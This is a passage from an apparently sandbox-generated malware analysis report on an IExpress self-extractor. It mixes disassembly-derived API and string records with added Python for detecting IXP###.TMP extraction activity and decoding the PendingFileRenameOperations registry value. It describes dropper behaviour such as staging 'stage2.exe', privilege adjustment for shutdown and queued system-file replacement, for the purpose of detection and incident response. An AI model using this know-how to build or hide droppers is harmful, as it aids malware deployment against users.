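    """Expand IXP%03d.TMP for one counter value exactly as sprintf would (0 -> 'IXP000.TMP')."""
    if not 0 <= counter <= 999:
        raise ValueError("IXP%03d.TMP can only name directories 000..999")
    return "IXP%03d.TMP" % counter


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed 'key=value|key=value' event line into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def find_ixp_activity(lines: Iterable[str]) -> Dict[str, dict]:
    """Group, per PID, the file writes into an IXP###.TMP directory and the child
    processes launched from one; PIDs with no hit are left out."""
    hits = defaultdict(lambda: {"dirs": set(), "files": [], "children": []})
    for line in lines:
        ev = parse_event(line)
        kind = ev.get("EventType")
        if kind == "FileCreate":
            path, pid = ev.get("TargetFilename", ""), ev.get("Pid")
        elif kind == "ProcessCreate":
            # attribute the launch to the parent: that is the process that extracted the file
            path, pid = ev.get("Image", ""), ev.get("ParentPid")
        else:
            continue
        match = IXP_DIR_RE.search(path)
        if not match or pid is None:
            continue
        rec = hits[pid]
        rec["dirs"].add(match.group(1).upper())
        if kind == "FileCreate":
            if not path.endswith("\\"):  # the directory itself is not a dropped file
                rec["files"].append(path)
        else:
            rec["children"].append(path)
    return {pid: {"dirs": sorted(rec["dirs"]), "files": rec["files"], "children": rec["children"]}
            for pid, rec in hits.items()}


# Constructed sample telemetry (not from the report): one extraction run, a benign
# Temp write, and a four-digit look-alike that must not match. PIDs and the dropped
# file name are invented.
SAMPLE_EVENTS: List[str] = [
    "EventType=FileCreate|Pid=4120|TargetFilename=C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\",
    "EventType=FileCreate|Pid=4120|TargetFilename=C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\stage2.exe",
    "EventType=ProcessCreate|Pid=4388|ParentPid=4120|Image=C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\stage2.exe",
    "EventType=FileCreate|Pid=5012|TargetFilename=C:\\Users\\user\\AppData\\Local\\Temp\\tmpA1B2.tmp",
    "EventType=FileCreate|Pid=5012|TargetFilename=C:\\Users\\user\\AppData\\Local\\Temp\\IXP0000.TMP\\notes.txt",
]

if __name__ == "__main__":
    for pid, rec in find_ixp_activity(SAMPLE_EVENTS).items():
        print(pid, rec)
```

Because %03d is fixed-width, the rule deliberately rejects IXP0000.TMP and IXP00.TMP; loosening the pattern to \d+ would trade fidelity to the recovered string for coverage of stubs with a different format. Grouping by PID puts the directory creation, the extracted files and any child process started from the directory into one finding, which is what an analyst needs to tie the later PowerShell activity back to the extractor.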
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocLocal
                                                                                          • String ID: TMP4351$.TMP
                                                                                          • API String ID: 3494564517-2619824408
                                                                                          • Opcode ID: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                          • Instruction ID: cbe72b7eaecd32667b9621f106e3450ee698faab61c7eedaa008f0edf183329e
                                                                                          • Opcode Fuzzy Hash: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                          • Instruction Fuzzy Hash: 70418C62A08791C7FB508B24E4143B97AA0BF99BA5F686238DA6E837D5CF7CD445C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
                                                                                          • API String ID: 3677997916-3057196482
                                                                                          • Opcode ID: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                          • Instruction ID: 0589e37b95ff00bd6b2f9e630fe8387ff7b6fa616a2ea42b6d06a59893a09063
                                                                                          • Opcode Fuzzy Hash: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                          • Instruction Fuzzy Hash: B2114C36A08B52C7E7109B55E45057AA6B0FF8D750FA0623DDBED82B58DF2DD444CA00
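The record above shows the stub opening System\CurrentControlSet\Control\Session Manager, querying PendingFileRenameOperations and closing the key; the report captures only the open, query and close, not what the stub does with the answer. That value is the list of renames and deletes the kernel applies at the next boot, so a non-empty value is the standard installer signal that a reboot is pending and that what is on disk may not survive it. The Python below is an added example, not from the report, that decodes the value's REG_MULTI_SZ layout (source/destination pairs in \??\ NT path form, an empty destination meaning delete, a leading ! meaning replace-existing) from a constructed blob. Reading the live value needs the Windows-only winreg module, which the optional helper imports lazily so the offline parts run anywhere.

```python
from typing import List, Optional, Tuple

SESSION_MANAGER_KEY = r"System\CurrentControlSet\Control\Session Manager"
PENDING_VALUE = "PendingFileRenameOperations"
NT_PREFIX = "\\??\\"


def encode_multi_sz(strings: List[str]) -> bytes:
    """Build a REG_MULTI_SZ blob: UTF-16LE, each string NUL-terminated, list ended by a NUL.

    An empty string inside the list is kept, because Windows stores a delete as an
    empty destination in this value."""
    return ("\x00".join(strings) + "\x00\x00").encode("utf-16-le")


def decode_multi_sz(raw: bytes) -> List[str]:
    """Inverse of encode_multi_sz; tolerates a blob whose final list terminator is missing."""
    if len(raw) % 2:
        raise ValueError("REG_MULTI_SZ data must be an even number of bytes")
    text = raw.decode("utf-16-le")
    if not text.endswith("\x00\x00"):
        text = text.rstrip("\x00") + "\x00\x00"
    body = text[:-2]  # drop the list terminator and the last string's own NUL
    return body.split("\x00") if body else []


def strip_nt_prefix(path: str) -> str:
    """Turn the NT form \\??\\C:\\x into C:\\x; other paths are returned unchanged."""
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pending_renames(strings: List[str]) -> List[Tuple[str, str, str]]:
    """Turn the decoded value into (operation, source, destination) triples.

    The kernel consumes the list in pairs: (source, "") deletes source at boot,
    (source, "!dest") moves source over an existing dest, (source, dest) is a plain rename."""
    if len(strings) % 2:
        raise ValueError("PendingFileRenameOperations must contain source/destination pairs")
    ops = []
    for src, dst in zip(strings[0::2], strings[1::2]):
        if dst == "":
            ops.append(("delete", strip_nt_prefix(src), ""))
        elif dst.startswith("!"):
            ops.append(("replace", strip_nt_prefix(src), strip_nt_prefix(dst[1:])))
        else:
            ops.append(("rename", strip_nt_prefix(src), strip_nt_prefix(dst)))
    return ops


def reboot_pending(raw: Optional[bytes]) -> bool:
    """What an installer stub concludes from the value: absent or empty means no reboot pending."""
    return bool(raw) and len(decode_multi_sz(raw)) > 0


def read_live_value() -> Optional[List[str]]:
    """Windows only: read the live value, or None when the value does not exist."""
    import winreg  # deferred import so the offline parts of this example run on any OS
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SESSION_MANAGER_KEY) as key:
        try:
            data, kind = winreg.QueryValueEx(key, PENDING_VALUE)
        except FileNotFoundError:
            return None
    if kind != winreg.REG_MULTI_SZ:
        raise ValueError("unexpected registry type %d" % kind)
    return data  # winreg already splits REG_MULTI_SZ into a list of str


# Constructed sample value (not taken from the report): one delete queued for a file
# in the stub's IXP000.TMP directory and one replace-existing move into System32.
SAMPLE_BLOB = encode_multi_sz([
    NT_PREFIX + r"C:\Users\user\AppData\Local\Temp\IXP000.TMP\stage2.exe", "",
    NT_PREFIX + r"C:\Windows\Temp\new.dll", "!" + NT_PREFIX + r"C:\Windows\System32\old.dll",
])

if __name__ == "__main__":
    for op in parse_pending_renames(decode_multi_sz(SAMPLE_BLOB)):
        print(op)
    print("reboot pending:", reboot_pending(SAMPLE_BLOB))
```

For incident response the decoded list matters more than the boolean: a queued delete of a file in the extractor's temp directory is the stub cleaning up after itself, while a queued replace of a system DLL is a persistence or tampering lead that only becomes visible after the next boot.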
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C23C80: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF681C23B49), ref: 00007FF681C23CA4
                                                                                            • Part of subcall function 00007FF681C23C80: PeekMessageA.USER32 ref: 00007FF681C23CC9
                                                                                            • Part of subcall function 00007FF681C23C80: PeekMessageA.USER32 ref: 00007FF681C23D0D
                                                                                          • WriteFile.KERNELBASE ref: 00007FF681C25924
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                          • String ID:
                                                                                          • API String ID: 1084409-0
                                                                                          • Opcode ID: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                          • Instruction ID: 909960f55e84e8fe4e63b51cf11a190e53b356c7e46e01ee77ba730b887b4fb1
                                                                                          • Opcode Fuzzy Hash: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                          • Instruction Fuzzy Hash: 22214F61B08582C7E7108F16E8443766771BF9E7A4F24A239D95E866A4CFBCD405CB44
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                          • String ID:
                                                                                          • API String ID: 2018477427-0
                                                                                          • Opcode ID: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                          • Instruction ID: 7317268b8727a5efe077ba06f14b1b453fa88e05b62b1ec3d1259383448f5e3f
                                                                                          • Opcode Fuzzy Hash: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                          • Instruction Fuzzy Hash: 01115731A0C642C3FB508B14E4443B6A6B0FF4E759F34A238C94E866A5CFBDE885C201
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharPrev
                                                                                          • String ID:
                                                                                          • API String ID: 122130370-0
                                                                                          • Opcode ID: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                          • Instruction ID: c446ba884318ea052a061bff805a11e8589b1086211a1754fdf51fddce7bc99d
                                                                                          • Opcode Fuzzy Hash: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                          • Instruction Fuzzy Hash: EA01C451A0C7C1CBF7104B15E48022DBAA1BB59BA0F686238DB69867D6CF2CDC42C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                          • Instruction ID: f0ef2bd5277e21b5cb93921db215a3eab74ef188f454957b73bc0f129dfd7b02
                                                                                          • Opcode Fuzzy Hash: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                          • Instruction Fuzzy Hash: B6F0F9326186C2D3EB184F25F5821B976B0FB4DB98F245239DA2B86694CE7CD481C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                          • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$gam
                                                                                          • API String ID: 3530494346-2071722121
                                                                                          • Opcode ID: e9cf0d75e323af3365a6df2e5f3018c508b1f812908897c7a83c784c3a62c979
                                                                                          • Instruction ID: 542812c723df2015dcee840e0c4d50d312b82b489ed41970f3284c8036d71eb7
                                                                                          • Opcode Fuzzy Hash: e9cf0d75e323af3365a6df2e5f3018c508b1f812908897c7a83c784c3a62c979
                                                                                          • Instruction Fuzzy Hash: 47716261E0C682CBF7609B21E5043796AB1BF9DB91F74B139CA4E86695CFBCE485C700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25220
                                                                                            • Part of subcall function 00007FF681C251F8: SizeofResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25231
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25257
                                                                                            • Part of subcall function 00007FF681C251F8: LoadResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25268
                                                                                            • Part of subcall function 00007FF681C251F8: LockResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25277
                                                                                            • Part of subcall function 00007FF681C251F8: memcpy_s.MSVCRT ref: 00007FF681C25296
                                                                                            • Part of subcall function 00007FF681C251F8: FreeResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C252A5
                                                                                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C25FB0
                                                                                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C25FC1
                                                                                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C25FD0
                                                                                          • GetDlgItem.USER32 ref: 00007FF681C25FFD
                                                                                          • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C2600E
                                                                                          • GetDlgItem.USER32 ref: 00007FF681C26026
                                                                                          • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF681C23432), ref: 00007FF681C2603A
                                                                                          • FreeResource.KERNEL32 ref: 00007FF681C26151
                                                                                          • SendMessageA.USER32 ref: 00007FF681C261B3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                          • String ID: CABINET
                                                                                          • API String ID: 1305606123-1940454314
                                                                                          • Opcode ID: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                                                                                          • Instruction ID: 6b8ede4c814f1b8f741f81f8aeaa4480b42879ac9a99379c8303e686e444bf84
                                                                                          • Opcode Fuzzy Hash: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                                                                                          • Instruction Fuzzy Hash: A0415971A08692C7FB509B60E8547796AB0FF8DB56F74A13CC90E82791DFBDE044C600
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                                          • API String ID: 4204503880-1888249752
                                                                                          • Opcode ID: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                          • Instruction ID: 34741363dfc581039714deecbec07583872b0d9fad487e18307424b88ce66306
                                                                                          • Opcode Fuzzy Hash: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                          • Instruction Fuzzy Hash: 6031B276608B45CBE7508F56E4441AABBB0FB8EB90F656129EE4E83714DF3CE545CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 2829607268-3733053543
                                                                                          • Opcode ID: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
                                                                                          • Instruction ID: 74c9c541b405f846cc3097b4fb62ad91a6ef8a37b7a7d1c430dd68785cdd7a03
                                                                                          • Opcode Fuzzy Hash: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
                                                                                          • Instruction Fuzzy Hash: 76216D72A18A42C7E7608B61E4457BABAB0FF8DB45F60A139DA4E83A54DF3CD045CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 4104442557-0
                                                                                          • Opcode ID: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                                                                                          • Instruction ID: fb2af4226b583aaf542ed7417175290eddbef81c70165f8d8b5b705327307181
                                                                                          • Opcode Fuzzy Hash: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                                                                                          • Instruction Fuzzy Hash: 4911F722A05B41CBEB409F71E8442A833B4FB4D758F502A38EA6D87754EF7CE5A4C240
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                                                                                          • Instruction ID: 707607326a32f74b7ad96be3bc8ceda5323e8897effd65741f81ea686e012965
                                                                                          • Opcode Fuzzy Hash: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                                                                                          • Instruction Fuzzy Hash: D0B09B4661759242D60557B54D4914516502F4A5247982558C618C1950D95CA159C604
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                          • String ID: $gam
                                                                                          • API String ID: 2654313074-718174934
                                                                                          • Opcode ID: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                                                                                          • Instruction ID: 3b00f3dd74c07688abe0cd39e3edcb5864f883beacc81ac5534a16ed78db2d58
                                                                                          • Opcode Fuzzy Hash: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                                                                                          • Instruction Fuzzy Hash: 59515F71E08A42C7E7508B15E9442796AB1FF8DB95F64B239C91E83B94CF7CA085C704
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                          • String ID: "$:$RegServer
                                                                                          • API String ID: 1203814774-766454958
                                                                                          • Opcode ID: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
• Instruction ID: ba94879caa4e8b048cadb7987fbea524c9931f698b94c5f5971ee7c9ad12ed5d
• Opcode Fuzzy Hash: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
• Instruction Fuzzy Hash: 11029F61A0C782C7FB618B28D4942796BB2BF6E750F78253DC95EC6695CE3CE405C701
APIs
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24B9A
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24BBE
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24BDE
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF681C23723), ref: 00007FF681C24C05
